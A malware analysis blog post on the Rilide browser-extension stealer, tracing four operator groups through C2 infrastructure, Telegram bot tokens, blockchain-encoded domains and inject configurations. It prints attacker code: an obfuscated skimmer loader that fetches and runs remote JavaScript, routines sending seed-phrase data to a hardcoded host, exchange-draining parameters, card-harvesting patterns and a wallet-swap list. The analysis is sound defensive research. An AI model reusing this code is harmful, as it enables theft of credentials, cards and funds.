Diving into Rilide

By: Jason Reaves, Joshua Platt and Jonathan McCay

Rilide, previously called CookieGenesis[1], is a malicious browser extension and an example of a class of malware that probably goes unnoticed more than it should. The latest version of Rilide includes the following functionality:

  • Credential harvesting
  • Cookie theft
  • Webinject system
  • Local proxy attack from CursedChrome
  • Gather Systeminfo
  • Retrieve a screenshot
  • Email injects
  • Hunt for files on disk
  • Hunt for wallets to replace
  • Manipulate or monitor balances on Facebook, Coinbase and Google Pay
  • Multiple methods of C2 traffic (Telegram chat, hardcoded, Telegram bot API with C2, decoding of wallet addresses from blockchain transactions)

Most of the functionality has been previously detailed in existing reports[2,3]. As such, we may not go into every single piece of functionality in this report. Our primary focus will be showcasing the main groups leveraging Rilide.

Group 1

The first group we found was a bit odd: they use a different structure for their C2 traffic, and not much is listed about them online. It appears to be distributed via a PPI service.

Smokeloader is used (5a0950cd155c81008cbd0878e9bd79b901e96dfc37e5bfd9a1cd51051efe3302):

olihonols.]in.]net
nicetolosv.]xyz
jftolsa.]ws
epohe.]ru

It downloads a PowerShell script from:

hxxps://paste[.]ee/d/ovjFg

The delivered PowerShell script gathers a range of information about the system it is running on and attempts to install an extension using the same method outlined by TrustWave[2]. Afterwards, it sends the data and installation status to a Telegram channel:

-1002236545487
7233612872:AAGE4M51A7TgVUdOl5d53-gq7j_62t8SwuQ

The admin in the channel:

{"user":{"id":6900032335,"is_bot":false,"first_name":"Tina","last_name":"Linares","username":"parlobecdi1988gr4k"},"status":"creator","is_anonymous":false}

Surprisingly enough, this same admin shows up in 3 other channels with different bot API keys. While Telegram was used for the installation process, the extension leverages blockchain transactions, base58-decoding wallet addresses that contain the C2 domain:

litecoin wallet: La3oY9mQfb4AcBg1Wq5g34utrPRXQ4zmS1

Decoding:

>>> import base58
>>> base58.b58decode('LUC9EJH9wB6GTRcMDrR7U3F8tyt7dPyZMi')
'0batumisolutions.com\x00\xc5sZ\xd1'

The domain gets a default URI appended to it:

const updateDomain = () =>
  new Promise(async (_0x142b2b) => {
    let _0x5da814 = await getDomain()
    return (
      chrome.storage.local.set({ domain: 'https://' + _0x5da814 + '/api' }),
      _0x142b2b(true)
    )
  })

The extension retrieves three main blobs of data from the C2:

  • settings
  • injects
  • commands

The settings are a collection of grabber links and a reverse proxy location; for this group:

{"grabberLinks":["apple.com","amazon.com","ebay.com","gmail.com","yahoo.com","walmart.com","lowes.com","x.com","admin","\/key\/","administrator","manager","control","panel","phpmyadmin","pma","shop","store","booking"],"reverseProxy":null}

The injects:

"url": "amazon.com",
"url": "facebook.com",
"url": "binance.com",
"url": "bitget.com",
"url": "bybit.com",
"url": "coinbase.com",
"url": "gate.io",
"url": "huobi.com",
"url": "kucoin.com",
"url": "mexc.com",
"url": "bingx.com",
"url": "accounts.google.com",
"url": "youtube.com",
"url": "steamcommunity.com",
"url": "steampowered.com",
"url": "YobZterKeA",
"url": "SNIFFER_PARAMETERS",
"url": "*,binance.com|kucoin.com|coinbase.com|bitget.com|bybit.com|gate.io|mexc.com|huobi.com|bingx.com",
"url": "blockchain.com",

Most of the inject functionality is about harvesting accounts that hold crypto or wallets of some kind. The ‘YobZterKeA’ section contains the functionality for manipulating and harvesting OTPs from emails; for example, consider Binance:

"codeLength": 6,
"emailDomain": "",
"firstTitle": "[Binance] Authorize New Device",
"regexString": "(?<!\\.\\d*)\\b\\d{6}\\b",
"secondTitle": {
"withHtml": "<span class=\"Zt\">&nbsp;-&nbsp;</span>You recently attempted to sign in to your Binance account from a new device or location. As a security measure, we require additional confirmation before allowing access to your Binance account.&nbsp",
"withoutHtml": "You recently attempted to sign in to your Binance account from a new device or location. As a security measure, we require additional confirmation before allowing access to your Binance account."
},
"subject": "[Binance] Authorize New Device",
"title": "[Binance] Authorize New Device"

The SNIFFER_PARAMETERS relate to the extraction of credit card data, in this case:

{
"cardsRegex": {
"AMEX": {
"flags": "g",
"pattern": "\\b3[47]\\d{2}(?:[\\s+-]?\\d{6}){1}(?:[\\s+-]?\\d{5}){1}\\b"
},
"DINERS": {
"flags": "g",
"pattern": "\\b3(?:0[0-5]|[68]\\d)(?:[\\s+-]?\\d{2}){1}(?:[\\s+-]?\\d{4}){2}\\b"
},
"DISCOVER": {
"flags": "g",
"pattern": "\\b6011(?:[\\s+-]?\\d{4}){3}\\b"
},
"JCB": {
"flags": "g",
"pattern": "\\b3\\d{3}(?:[\\s+-]?\\d{4}){3}\\b"
},
"MC": {
"flags": "g",
"pattern": "\\b5\\d{3}(?:[\\s+-]?\\d{4}){3}\\b"
},
"VISA": {
"flags": "g",
"pattern": "\\b4\\d{3}(?:[\\s+-]?\\d{4}){3}\\b"
}
},
"extractData": {
"addName": {
"regex": {
"flags": "i",
"pattern": "additional|middle"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s.]+$"
}
},
"addressLine1": {
"regex": {
"flags": "i",
"pattern": "line1|addr1|address1"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\d\\s\\-.\\/]+$"
}
},
"addressLine2": {
"regex": {
"flags": "i",
"pattern": "line2|addr2|address2"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\d\\s\\-.\\/]+$"
}
},
"cardNumber": {
"regex": {
"flags": "i",
"pattern": "cardnumber|cardnum|number|card|credit"
}
},
"city": {
"regex": {
"flags": "i",
"pattern": "city"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s]+$"
}
},
"country": {
"regex": {
"flags": "i",
"pattern": "country"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s]+$"
}
},
"cvv": {
"regex": {
"flags": "i",
"pattern": "cvv|cvc|cardsecuritycode"
},
"validRegex": {
"flags": "",
"pattern": "^\\d{3}$"
}
},
"expDate": {
"regex": {
"flags": "i",
"pattern": "expDate|expiration|expiryDate|exp_date|date|cardexpiry"
},
"validRegex": {
"flags": "",
"pattern": "^(0[1-9]|1[0-2])[\\/-](\\d{2}|\\d{4})$|^(\\d{2}|\\d{4})[\\/-](0[1-9]|1[0-2])$"
}
},
"expMonth": {
"regex": {
"flags": "i",
"pattern": "expMonth|exp_month|month"
},
"validRegex": {
"flags": "",
"pattern": "^(0[1-9]|1[0-2])$"
}
},
"expYear": {
"regex": {
"flags": "i",
"pattern": "expYear|exp_year|year"
},
"validRegex": {
"flags": "",
"pattern": "^(2[4-9]|[3-9]\\d|202[4-9]|20[3-9]\\d)$"
}
},
"firstName": {
"regex": {
"flags": "i",
"pattern": "first"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s.]+$"
}
},
"lastName": {
"regex": {
"flags": "i",
"pattern": "last"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s.]+$"
}
},
"name": {
"regex": {
"flags": "i",
"pattern": "name|holder"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s.]+$"
}
},
"state": {
"regex": {
"flags": "i",
"pattern": "state|provin"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\s]+$"
}
},
"zipCode": {
"regex": {
"flags": "i",
"pattern": "zip|postal"
},
"validRegex": {
"flags": "",
"pattern": "^[A-Za-z\\d-]{4,10}$"
}
}
},
"requiredFields": [
"cardNumber",
"cvv"
],
"state": "ON"
}

The injects are mostly geared toward crypto exchanges, primarily for data harvesting and manipulation:

TOTAL_BALANCE_THRESHOLD = 500000,
NON_SELL_THRESHOLD_PERCENTAGE = 5,
PARTIAL_SELL_PERCENTAGE = 30,
MIN_PARTIAL_SELL_PERCENTAGE = 60,
MAX_PARTIAL_SELL_PERCENTAGE = 90,
TICKER_WITHDRAW = WITHDRAW_CONFIG[3],
ORDER_AMOUNT_ADJUSTMENT_FACTOR = 1,
IS_ON_HANDLE_SIMPLEFLEXIBLE = true,
COUNT_PROCESS_SIMPLEFLEXIBLE = 3,
MIN_AMOUNT_CHECK_ASSET = 0.1,
MIN_AMOUNT_TRANSFER = 10,
MIN_AMOUNT_CONVERT = 10,
MIN_AMOUNT_WITHDRAW = 200,
MIN_AMOUNT_REDEEM = 50,
PERCENT_TRANSFER = 1,
MIN_PERCENT_TOTAL_TRANSFER = 0.1,
MIN_PERCENT_CURRENT_ACCOUNT_TRANSFER = 0.1,
PERCENT_CONVERT = 1,
MIN_PERCENT_TOTAL_CONVERT = 0.1,
MIN_PERCENT_CURRENT_ACCOUNT_CONVERT = 0.1,
TIMEOUT_TRANSFER = [199, 399],
TIMEOUT_CONVERT = [199, 399],
TIMEOUT_REDEEM = [199, 399],
TIMEOUT_BETWEEN_OPERATIONS = [400, 700],
AMOUNT_FOR_FULL_WITHDRAW = 1000,
PERCENT_WITHDRAW = 0.7,
_0x540b3c = {
spotBalance:
'/bapi/asset/v2/private/asset-service/wallet/balance?needBalanceDetail=true&quoteAsset=USDT',
marginBalance: '/bapi/margin/v1/private/margin/account-details',
isoMarginBalance:
'/bapi/margin/v1/private/isolated-margin/isolated-margin-account-details',
futures: '/bapi/futures/v4/private/future/user-data/user-balance',
delivery: '/bapi/futures/v2/private/delivery/user-data/user-balance',
card: '/bapi/c2c/v1/private/c2c/asset/balance',
simpleFlexible: '/bapi/earn/v2/private/lending/daily/token/position',
accountDetails: '/bapi/accounts/v1/private/account/user/base-detail',
listVerify:
'/bapi/accounts/v1/protect/account/getVerificationTwoCheckList',
liquidationMarginBorrow:
'/bapi/margin/v1/private/margin/manual-liquidation',
simpleFlexibleRedeem: '/bapi/earn/v1/private/lending/daily/redeem',
getPrice: '/api/v3/ticker/price',
getMaxAmountFutures:
'/bapi/futures/v1/private/future/user-data/getMaxWithdrawAmount',
getMaxAmountDelivery:
'/bapi/futures/v1/private/delivery/user-data/getMaxWithdrawAmount',
transfer: '/bapi/asset/v1/private/asset-service/wallet/transfer',
getQuoteConvert: '/bapi/margin/v1/private/new-otc/get-quote',
executeQuote: '/bapi/margin/v1/private/new-otc/execute-quote',
logout: '/bapi/accounts/v1/private/authcenter/logout',
placeOrder: '/bapi/mbx/v1/private/mbxgateway/order/place',
getExchangeInfo:
'/bapi/asset/v1/public/asset-service/product/get-exchange-info',
}

As previously reported, they also go after sites with rewards or credit card programs, such as retailers, Google Pay, Facebook, Steam profiles, and the Steam store and inventory:

await sendCheckerInfo({
login: localStorage.getItem('loginSteam') ?? _0x2554eb?.email,
password: localStorage.getItem('passwordSteam'),
balance: _0x2554eb?.balance ?? 'NA',
currency: null,
additionalInfo:
'Country: ' + _0x2554eb?.country_code ??
'NA' + ' / Account name: ' + _0x2554eb?.account_name ??
'NA' + ' / Phone: ' + _0x2554eb?.phone ??
'NA' + ' / Security: ' + _0x2554eb?.security ??
'NA' + ' / Status: ' + _0x2554eb?.status ??
'NA' + ' / Is limited: ' + _0x2554eb?.is_limited ??
'NA',
cards: [],
spend: _0x4810f1,
orders: _0x2554eb?.notification ?? [],
})

Group 2

One of the more interesting groups we found was leveraging the same targets as outlined by a TrustWave report in 2023[2].

This group leverages Telegram for retrieving the main domain:

{"ok":true,"result":[{"update_id":591912390,
"message":{"message_id":345,"from":{"id":1747486344,"is_bot":false,"first_name":"Emergency","username":"Bot31337"},"chat":{"id":-613012199,"title":"DomainPost1","type":"group","all_members_are_administrators":true},"date":1725524234,"text":"hxxps://extensionsupdates[.]top/api","entities":[{"offset":0,"length":33,"type":"url"}],"link_preview_options":{"is_disabled":true}}}]}

The grabber links from the C2 make this an interesting group because they appear to be going for enterprise creds as well:

{
"grabberLinks": [
"newcastlepermanent.com.au",
"nab.com",
"commbank.com",
"heritage",
"beyondbank",
"bendigobank",
"originmms",
"mebank",
"nabtrade",
"bank",
"nabconnect.nab.com.au/login",
"logon.online.anz.com/auth/Logon/",
"commbiz",
"anz.com",
"bankofmelbourne.com.au",
"imb.com.au",
"westpac.com.au",
"paypal",
"merchant",
"outlook",
"login.microsoftonline.com",
"login.live.com",
"eftpos",
"binance",
"coinspot",
"stgeorge.com.au",
"/admin/",
"index/admin",
"/cart/admin",
"huobi",
"suncorp",
"citrix",
"commbiz",
"commsec",
"boq.com.au",
"macquarie",
"bbo.",
"transact",
"webmail",
"gcmutual",
"airwallex",
"stripe",
"RDWeb",
"index/key",
"admin",
"smpsso",
"sales_order",
"sp_admin",
"cybersource",
"globalpay",
"secureexchange",
"huobi",
"kukoin",
"vpn.",
"wise.com",
"owa/auth/logon.aspx",
"facebook",
"adsmanager",
"intelco",
"wix.com",
"latitude",
"mastercard",
"ing.com.au",
"sharepoint.com",
"slack.com",
"greater",
"hsbc",
"rabobank",
"bankaust",
"swyftx",
"login.yahoo.com",
"icbc.com",
"amazon.com/ap/signin"
],
"reverseProxy": null
}

Inject Targets:

"url": "nabconnect.nab.com.au"
"url": "transact.nab.com.au"
"url": "migs.mastercard.com.au"
"url": "tyro.gateway.mastercard.com"
"url": "cipg.gateway.mastercard.com"
"url": "js.stripe.com"
"url": "checkout.stripe.com"
"url": "nab.com.au"
"url": "quickstream.westpac.com.au"

Most of the injects have the following JavaScript code inside of them:

((v, w, d)=> { d = this; (d && d.nodeType === 1 && d.parentNode.removeChild(d)); if (w['pgg_lo_fl'] || navigator['webdriver']) return; w['pgg_lo_fl'] = 1; var W = window.WebSocket, sortvis = function () { if (v-- > 0) { for (var i = 0, s = ''; i < 34; i++) s += (String.fromCharCode(atob('PDI/ampkMSE0Ny4yKTE3KCliMyombiU+IS45KzwqKSAgfw').charCodeAt(i) ^ 'KALPE'.charCodeAt(Math.floor(i % 5)))); w = new W(s); w.onmessage = function (e) { new Function(atob(e['data'])).call(this) }; w.onclose = function (a) { a.wasClean || setTimeout(sortvis, 1000) } } }; sortvis(); })(1, self);

Decoding the C2:

>>> import base64
>>> a = 'PDI/ampkMSE0Ny4yKTE3KCliMyombiU+IS45KzwqKSAgfw'
>>> temp = base64.b64decode(a+'==')
>>> temp
'<2?jjd1!47.2)17()b3*&n%>!.9+<*) \x7f'
>>> temp = bytearray(temp)
>>> for i in range(len(temp)):
... temp[i] ^= bytearray('KALPE')[i%5]
...
>>> temp
bytearray(b'wss://pmdresearch.com/indexglobal/')
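As an added example (not code from the report or from the skimmer), the following Python pulls the atob() blob and the XOR key out of loader text shaped like the one above and reproduces the decode from the session; the two regexes and the LOADER_FRAGMENT constant are my own and assume the loader keeps the atob('...').charCodeAt(i) ^ 'KEY'.charCodeAt(...) form.

```python
import base64
import re

# Captures the base64 argument of atob('...') in the loader source.
BLOB_RE = re.compile(r"atob\('([A-Za-z0-9+/=]+)'\)")
# Captures the string literal XORed against the decoded bytes.
KEY_RE = re.compile(r"\^\s*'([^']+)'\.charCodeAt")


def xor_decode(blob_b64, key):
    """Base64-decode the blob (restoring stripped '=' padding) and XOR with a repeating key."""
    padded = blob_b64 + "=" * (-len(blob_b64) % 4)
    raw = base64.b64decode(padded)
    key_bytes = key.encode("ascii")
    plain = bytes(b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(raw))
    # Real C2 URLs are ASCII; anything else is replaced rather than raising.
    return plain.decode("ascii", errors="replace")


def extract_c2(loader_js):
    """Locate blob and key in loader text and return the decoded C2 URL, or None if absent."""
    blob = BLOB_RE.search(loader_js)
    key = KEY_RE.search(loader_js)
    if not blob or not key:
        return None
    return xor_decode(blob.group(1), key.group(1))


# The part of the loader shown above that carries the blob and the key
# (extracted by hand; the surrounding WebSocket code is omitted).
LOADER_FRAGMENT = (
    "s += (String.fromCharCode(atob('PDI/ampkMSE0Ny4yKTE3KCliMyombiU+IS45KzwqKSAgfw')"
    ".charCodeAt(i) ^ 'KALPE'.charCodeAt(Math.floor(i % 5))));"
)

if __name__ == "__main__":
    print(extract_c2(LOADER_FRAGMENT))
```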

This C2 has overlap with existing work by Akamai researchers into what they have reported as MageCart activity[4].

Group 3

This group appears to be mostly Spanish-themed and was previously discussed by Metabase Q[5]. We discovered it being delivered via Itero[6], a “Browser Extension Cloud”:

hxxps://itero.plasmo[.]com/api/ext/install/hfigjgngfhigeliddoogcppigdmoehcl

C2:

panelUrl: 'hxxps://facturamexico2023[.]com/api',

The domain was no longer resolving at the time, but we managed to recover the settings and injects:

{"grabberLinks":["mail.ionos.mx","bitso.com","login.coinbase.com","am.profuturo.mx","appweb.alquimiapay.com","exitusfintech","binance.com","login.live.com"],"reverseProxy":null}

Inject targets:

"url": "bancanetempresarial.banamex.com.mx",
"url": "bancanetempresarial.citibanamex.com.mx",
"url": "bancanet.banamex.com",
"url": "security.online-banking.hsbc.com.mx",
"url": "see.sbi.com.mx",
"url": "bbva.mx",
"url": "bancaporinternet.bb.com.mx",
"url": "empresas.bbvanet.com.mx",
"url": "binance.com",

Deobfuscating the injects and harvesting the ATS injects:

script.src = 'hxxps://facturacionmexico[.net/ok.js

otherScript.src = 'hxxps://dlxfreights[.site/mx/hsbc/main.js';

hxxps://dlxfreights[.site/uadmin/gate.php

hxxps://bbj-com-mx.utilidad96we2[.online/Bajionet.php?t=1

iframe.src = 'hxxps://bnce.facturaarge[.autos/

replace(\"hxxps://s1conexion[.info/?s=12\

The first domain also led to this cached telegram API response from VirusTotal:

{"ok":true,"result":[{"update_id":868522626,
"message":{"message_id":63,"from":{"id":854919828,"is_bot":false,"first_name":"Nnnnooo","username":"GGrtx1","language_code":"en"},"chat":{"id":-1002063201454,"title":"Dominio3","type":"supergroup"},"date":1712558709,"text":"hxxps://facturacionmexico[.net/dom3.js","entities":[{"offset":0,"length":37,"type":"url"}],"link_preview_options":{"url":"hxxps://facturacionmexico[.net/dom3.js"}}}]}

Group 4

This group potentially has the most research publicly posted about it. They seem to primarily leverage blockchain wallets for C2; the initial one we started with was ‘bc1qvkvzfla6wrem2uf4ejkuja8yp3c6f3xf72kyc9’, which also shows up in a blog post by eSentire[3] and in a researcher's blog[7].

Transactions:

"vout": [
{
"scriptpubkey": "76a914747275652d6c69652e636f6d000000000000000088ac",
"scriptpubkey_address": "1BciVyU1g7TdD5Mo2t7DsLHVjyAkBhSxhw",
"scriptpubkey_asm": "OP_DUP OP_HASH160 OP_PUSHBYTES_20 747275652d6c69652e636f6d0000000000000000 OP_EQUALVERIFY OP_CHECKSIG",
"scriptpubkey_type": "p2pkh",
"value": 49206
}
],


"vout": [
{
"scriptpubkey": "76a914747275652d626f74746f6d2e636f6d000000000088ac",
"scriptpubkey_address": "1BciVyU1eHXhEKpkJgHyt7hU381yFJHyA1",
"scriptpubkey_asm": "OP_DUP OP_HASH160 OP_PUSHBYTES_20 747275652d626f74746f6d2e636f6d0000000000 OP_EQUALVERIFY OP_CHECKSIG",
"scriptpubkey_type": "p2pkh",
"value": 21485
}
],

Decoding addresses:

>>> base58.b58decode('1BciVyU1eHXhEKpkJgHyt7hU381yFJHyA1')
'\x00true-bottom.com\x00\x00\x00\x00\x00 gv:'
>>> base58.b58decode('1BciVyU1g7TdD5Mo2t7DsLHVjyAkBhSxhw')
'\x00true-lie.com\x00\x00\x00\x00\x00\x00\x00\x00\xa1T\xf3\xea'
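As an added example (not the authors' code), this Python recovers the smuggled domain both from a Base58 address, as in the decoding sessions here and in Group 1, and directly from the P2PKH scriptpubkey hex shown in the transaction outputs; the Base58 decoder is written inline so no third-party package is needed, and the Base58Check checksum is verified so a retyped or corrupted address is caught rather than silently mis-decoded.

```python
import hashlib

# Base58 alphabet shared by Bitcoin and Litecoin addresses.
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text):
    """Decode a Base58 string to bytes; each leading '1' becomes a 0x00 byte."""
    n = 0
    for ch in text:
        n = n * 58 + ALPHABET.index(ch)
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    zeros = len(text) - len(text.lstrip("1"))
    return b"\x00" * zeros + body


def hash160_to_domain(h160):
    """Interpret a 20-byte hash160 as a NUL-padded ASCII hostname, or return None."""
    if len(h160) != 20:
        return None
    stripped = h160.rstrip(b"\x00")
    # A genuine hash160 is 20 pseudo-random bytes; a smuggled domain is short printable ASCII.
    if not stripped or any(b < 0x21 or b > 0x7E for b in stripped):
        return None
    return stripped.decode("ascii")


def domain_from_address(address):
    """Decode a P2PKH address: version byte, checksum validity and any hidden domain."""
    raw = b58decode(address)
    if len(raw) != 25:
        raise ValueError("not a 25-byte Base58Check payload")
    version, h160, checksum = raw[0], raw[1:21], raw[21:]
    expected = hashlib.sha256(hashlib.sha256(raw[:21]).digest()).digest()[:4]
    return {
        "version": version,            # 0x00 for Bitcoin P2PKH, 0x30 ('L'...) for Litecoin
        "checksum_ok": checksum == expected,
        "domain": hash160_to_domain(h160),
    }


def domain_from_scriptpubkey(script_hex):
    """Recover the domain straight from a P2PKH scriptpubkey: 76 a9 14 <20 bytes> 88 ac."""
    script = bytes.fromhex(script_hex)
    if len(script) != 25 or script[:3] != b"\x76\xa9\x14" or script[23:] != b"\x88\xac":
        return None
    return hash160_to_domain(script[3:23])


if __name__ == "__main__":
    # Values taken from the transaction outputs and decoding sessions above.
    for addr in ("1BciVyU1g7TdD5Mo2t7DsLHVjyAkBhSxhw", "1BciVyU1eHXhEKpkJgHyt7hU381yFJHyA1"):
        print(addr, domain_from_address(addr))
    print(domain_from_scriptpubkey("76a914747275652d6c69652e636f6d000000000000000088ac"))
```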

While investigating recent infrastructure we noticed some similarities with some of the older C2 groupings, which have also been outlined here[7]. Unfortunately the older infrastructure appeared to be down when we checked, but we did notice a pretty clear overlap in the injects config for a few of them:

Injects from 50elk[.com

cat 50elk_injects.txt |python -m json.tool |grep '"url":'
"url": "binance",
"url": "blockchain.com",
"url": "coinbase.com",
"url": "kucoin.com",
"url": "htx.com",
"url": "bitget.com",
"url": "gate.io",
"url": "bybit.com",
"url": "portfolio.metamask.io",
"url": "EMAIL_CONFIG",
"url": "bingx.com",
"url": "mexc.com",
"url": "whitebit.com",
"url": "business.facebook.com",
"url": "CLIPPER_DATA",
"url": "app.uniswap.org|pancakeswap.finance|app.1inch.io|sushi.com|app.balancer.fi|dydx.trade|app.dodoex.io|solidly.com|curve.fi",
"url": "FINDER_DATA",
"url": "amazon",

Injects from x504x[.com

cat x504x_injects.txt |python -m json.tool |grep '"url":'
"url": "binance",
"url": "blockchain.com",
"url": "coinbase.com",
"url": "kucoin.com",
"url": "htx.com",
"url": "bitget.com",
"url": "gate.io",
"url": "bybit.com",
"url": "portfolio.metamask.io",
"url": "EMAIL_CONFIG",
"url": "bingx.com",
"url": "mexc.com",
"url": "whitebit.com",
"url": "business.facebook.com",
"url": "CLIPPER_DATA",
"url": "app.uniswap.org|pancakeswap.finance|app.1inch.io|sushi.com|app.balancer.fi|dydx.trade|app.dodoex.io|solidly.com|curve.fi",
"url": "FINDER_DATA",
"url": "amazon",

Injects from dot4net[.com

cat vt/tmp2/dot4net_injections.txt |python -m json.tool |grep '"url":'
"url": "binance",
"url": "blockchain.com",
"url": "coinbase.com",
"url": "kucoin.com",
"url": "htx.com",
"url": "bitget.com",
"url": "gate.io",
"url": "bybit.com",
"url": "portfolio.metamask.io",
"url": "EMAIL_CONFIG",
"url": "bingx.com",
"url": "mexc.com",
"url": "whitebit.com",
"url": "business.facebook.com",
"url": "CLIPPER_DATA",
"url": "app.uniswap.org|pancakeswap.finance|app.1inch.io|sushi.com|app.balancer.fi|dydx.trade|app.dodoex.io|solidly.com|curve.fi",
"url": "FINDER_DATA",
"url": "amazon",

Another overlap comes in the form of the inject against Amazon, specifically the exfiltration location on telegram:

50elk:

UUID = document.querySelector('#uuidMachine')?.textContent ?? 'Unknown',
VERSION = '1.0.2',
CHAT_ID = '-1002247417462',
BOT_TOKEN = '7500014126:AAFomRFjhtRJN0AU73mdWxwWtRTOW4bsO50',
CHECK_TIME = 60,

x504x:

UUID = document.querySelector('#uuidMachine')?.textContent ?? 'Unknown',
VERSION = '1.0.4',
CHAT_ID = '-1002247417462',
BOT_TOKEN = '7500014126:AAFomRFjhtRJN0AU73mdWxwWtRTOW4bsO50',
LOGOUT_TIME = 604800000,
CHECK_TIME = 60,

dot4net:

UUID = document.querySelector('#uuidMachine')?.textContent ?? 'Unknown',
VERSION = '1.0.0',
CHAT_ID = '-1002247417462',
BOT_TOKEN = '7500014126:AAFomRFjhtRJN0AU73mdWxwWtRTOW4bsO50',
CHECK_TIME = 60,

For the crypto-targeting injects in this group, the data is sent to a hardcoded domain:

const _0x3f953b = 'hxxps://muchograciesamigos[.com/'
const _0x1804f4 = async (_0x58999e, _0x2a0f05, _0x4c2bb7, _0x1b45a8) => {
const _0x546a2b = new Date().toISOString(),
_0x41b990 = {
time: _0x546a2b,
version: '1.0.0',
description: _0x1b45a8,
func: _0x4c2bb7,
email: _0x2a0f05,
type: _0x58999e,
uuid: $('#uuidMachine').text(),
folder: 'METAMASK_SEED',
},
_0xd2c246 = {
type: 'POST',
url: _0x3f953b + 'logs.php',
headers: {},
data: _0x41b990,
}

Some of the other crypto injects also appear to have functionality for stealing crypto, such as the Coinbase one:

const requestDataPaymentMethods = _0x1e4d53,
_0x3036e6 = {
whiteList: 'https://www.coinbase.com/api/v2/user/address-whitelisting',
getMethodSecondFactor:
'https://www.coinbase.com/api/v2/user/second-factor',
getUserData: 'https://www.coinbase.com/api/v2/user',
signOut: 'https://www.coinbase.com/signout',
manageSecondFactor:
'https://www.coinbase.com/api/two-factor/v1/management',
enabledTypes:
'https://login.coinbase.com/api/two-factor/v1/enabled-types',
challenge: 'https://login.coinbase.com/api/two-factor/v1/challenge',
verify: 'https://login.coinbase.com/api/two-factor/v1/verify',
}
const _0x5075d1 = { urls: _0x3036e6 }
const apiConfig = _0x5075d1,
_0xc50478 = {
network: 'ethereum',
wallet: '0xAB5ca32AE1e009fec2EA665bcdD66b155326CBD8',
name: 'ETH',
depositUri: 'ethereum:',
}
const _0x5d4bfd = {
network: 'bitcoin',
wallet: '13zJ6SeN13PX66guAmERAtitdB8qXGEwik',
name: 'BTC',
depositUri: 'bitcoin:',
}
const _0x170de9 = {
network: 'litecoin',
wallet: 'LRiU6znQYtJwBfyz6J1jqzSLeSz3b9jiQk',
name: 'LTC',
depositUri: 'litecoin:',
}
const _0x23e8ee = {
network: 'ethereum',
wallet: '0xAB5ca32AE1e009fec2EA665bcdD66b155326CBD8',
name: 'USDT',
depositUri:
'ethereum:0xdac17f958d2ee523a2206206994597c13d831ec7/transfer?address=',
}
const _0x1937c2 = {
network: 'ethereum',
wallet: '0xAB5ca32AE1e009fec2EA665bcdD66b155326CBD8',
name: 'SHIB',
depositUri:
'ethereum:0x95aD61b0a150d79219dCF64E1E6Cc01f0B64C4cE/transfer?address=',
}
const _0x56a870 = {
network: 'ethereum',
wallet: '0xAB5ca32AE1e009fec2EA665bcdD66b155326CBD8',
name: 'USDC',
depositUri:
'ethereum:0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48/transfer?address=',
}
const _0x2433f7 = {
network: 'xrp',
wallet: 'rERDrE8Pf2pEdkneRKCxe9aXCEzhu3eBcx',
name: 'XRP',
depositUri: 'xrp:',
}
const _0x417147 = {
network: 'solana',
wallet: 'G3ozx5xtEqGAGi3VdsQGKGHxuwqSJDTn38vEUEREQweQ',
name: 'SOL',
depositUri: 'solana:',
}
const CONFIG_SPOOF = [
_0xc50478,
_0x5d4bfd,
_0x170de9,
_0x23e8ee,
_0x1937c2,
_0x56a870,
_0x2433f7,
_0x417147,
],
getWallet = (_0x2b47b3, _0x2a27d0 = CONFIG_SPOOF) => {
for (const _0x1df863 of _0x2a27d0) {
if (_0x2b47b3.includes(_0x1df863.name)) {
return {
address: _0x1df863.wallet,
depositUri: _0x1df863.depositUri + _0x1df863.wallet,
}
}
}
return null
}

Indicators of Compromise

Domains:


References

1: https://www.trellix.com/en-hk/blogs/research/genesis-market-no-longer-feeds-the-evil-cookie-monster/

2: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/new-rilide-stealer-version-targets-banking-data-and-works-around-google-chrome-manifest-v3/

3: https://www.esentire.com/blog/lummac2-malware-and-malicious-chrome-extension-delivered-via-dll-side-loading

4: https://www.akamai.com/blog/security-research/magecart-new-technique-404-pages-skimmer

5: https://www.metabaseq.com/threat/cybercartel/

6: https://docs.plasmo.com/itero

7: https://pberba.github.io/crypto/2024/09/14/malicious-browser-extension-genesis-market/

Diving into Rilide was originally published in Walmart Global Tech Blog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Article Link: Diving into Rilide. By: Jason Reaves, Joshua Platt and… | by Jason Reaves | Walmart Global Tech Blog | Sep, 2024 | Medium